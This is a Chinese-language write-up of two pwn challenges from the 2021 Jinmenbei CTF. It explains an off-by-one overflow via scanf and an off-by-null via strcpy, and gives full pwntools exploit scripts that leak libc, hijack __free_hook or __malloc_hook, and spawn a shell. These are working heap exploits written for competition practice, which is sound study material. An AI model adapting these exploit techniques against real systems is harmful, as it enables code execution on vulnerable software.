2021津门杯Writeup

easypwn

新建的堆块时，存在 off by one

phone number 和 name 写入函数使用的是 scanf 。scanf 是危险函数，可以一直输入直到遇到 \n 。

指针存放地址在 name 后面，可以通过溢出修改指针地址。

EXP

from pwn import *
context.log_level = 'debug'
context.terminal = ['tmux','sp','-h']

def cmd(cmd):
    p.recvuntil(">>")
    p.sendline(str(cmd))
def add(number,name,size,des):
    cmd(1)
    p.sendlineafter("number:",number)
    p.sendlineafter("name:",name)
    p.sendlineafter("size:",str(size))
    p.sendafter("info:",des)
def add_1(number,name,size):
    cmd(1)
    p.sendlineafter("number:",number)
    p.sendlineafter("name:",name)
    p.sendlineafter("size:",str(size))
def delete(id):
    cmd(2)
    p.sendlineafter("index:",str(id))
def show(id):
    cmd(3)
    p.sendlineafter("index:",str(id))
def edit(id,number,name,des):
    cmd(4)
    p.sendlineafter("index:",str(id))
    p.sendlineafter("number:",number)
    p.sendlineafter("name:",name)
    p.sendafter("info:",des)

p = process("./hello")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

add('a'*8,'b'*8,0x80,'c'*0x81)
add('a'*8,'b'*8,0x80,'c'*0x81)
add('a'*8,'b'*8,0x80,'/bin/sh\x00\n')
delete(0)
edit(0,'a'*8,'b'*(0xd-1),'c')
show(0)
main_arean_xx = u64(p.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
log.info("main_arean_xx:"+hex(main_arean_xx))
libc_base = main_arean_xx - (0x7fa2625e2b78-0x7fa26221e000)
log.info("main_arean_xx:"+hex(libc_base))
free_hook = libc_base + libc.sym['__free_hook']
log.info("free_hook:"+hex(free_hook))
system_addr = libc_base + libc.sym['system']
log.info("system_addr:"+hex(system_addr))


# gdb.attach(p,"b *$rebase(0xde9)")

edit(1,'a'*8,'b'*0xd+p64(free_hook),p64(system_addr)+'\n')

delete(2)

p.interactive()

PwnCTFM

漏洞点在 add 的时，先将堆内存写入到 alloc 申请的栈空间，然后用 strcpy 将栈空间内容复制到堆中。

Strcpy 特性：

• 会一直复制，直到遇到 \x00
• 将字符串复制到目的内存后会加上 \x00 ，而 strncpy 则不会

这条题目利用 strcpy 会在字符串后面加上 \x00 ，造成 off by null 。大概思路：

1. off by null 造成堆重叠，泄露 libc
2. 基于上面堆分布，申请两个指向同一地址的指针，fastbin attack

形成堆重叠需要修改 prev_size ，strcpy 会遇到 \x00 截断，所以要弄个循环清空 prev_size 搞字节：

#清洗prev_size
delete(1)
for i in range(9):
    add('a',0x68,'b'*(0x60+(8-i)),-1)#0
    delete(0)

EXP

#encoding:utf-8
from pwn import *
context.log_level="debug"
context.terminal=['tmux','sp','-h']

def cmd(cmd):
    p.sendlineafter(">>",str(cmd))
def add(name,size,des,score):
    cmd(1)
    p.sendafter("name:",name)
    p.sendlineafter("size:",str(size))
    p.sendafter("des:",des)
    p.sendlineafter("score:",str(score))
def delete(id):
    cmd(2)
    p.sendlineafter("index:",str(id))
def show(id):
    cmd(3)
    p.sendlineafter("index:",str(id))

p = process("./pwn")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

p.sendlineafter("name:","CTFM")
p.sendlineafter("password:","123456")

add('a',0xf8,'b',-1)#0
add('a',0x68,'b'*0x68,-1)#1
add('a',0xf8,'b',-1)#2
add('a',0xf8,'b',-1)#3 protect

delete(0)

#清洗prev_size
delete(1)
for i in range(9):
    add('a',0x68,'b'*(0x60+(8-i)),-1)#0
    delete(0)
#写入prev_size
add('a',0x68,'b'*0x60+p32(0x170),-1)#0
delete(2)
add('a',0xf8,'b',-1)#1
show(0)
main_arean_xx  = u64(p.recvuntil("\x7f")[-6:].ljust(8,'\x00'))
libc_base = main_arean_xx - (0x7f38b0163b78-0x7f38afd9f000)
log.info("libc_base:"+hex(libc_base))
malloc_hook = libc_base+libc.sym['__malloc_hook']
log.info("malloc_hook:"+hex(malloc_hook))
system_addr = libc_base+libc.sym['system']


add('a',0x68,'b'*0x10,-1)#2
add('a',0x68,'b'*0x10,-1)#4

delete(0)
delete(4)
delete(2)
add('a',0x68,p64(malloc_hook-0x23),-1)#0
add('a',0x68,p64(malloc_hook-0x23),-1)#2
add('a',0x68,p64(malloc_hook-0x23),-1)#4
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf0364 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1207 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
add('a',0x68,'a'*0x13+p64(libc_base+0x4527a),-1)#5

# gdb.attach(p)
cmd(1)
p.sendafter("name:","skye")
p.sendlineafter("size:",str(123))
p.sendafter("des:","dddd")

p.interactive()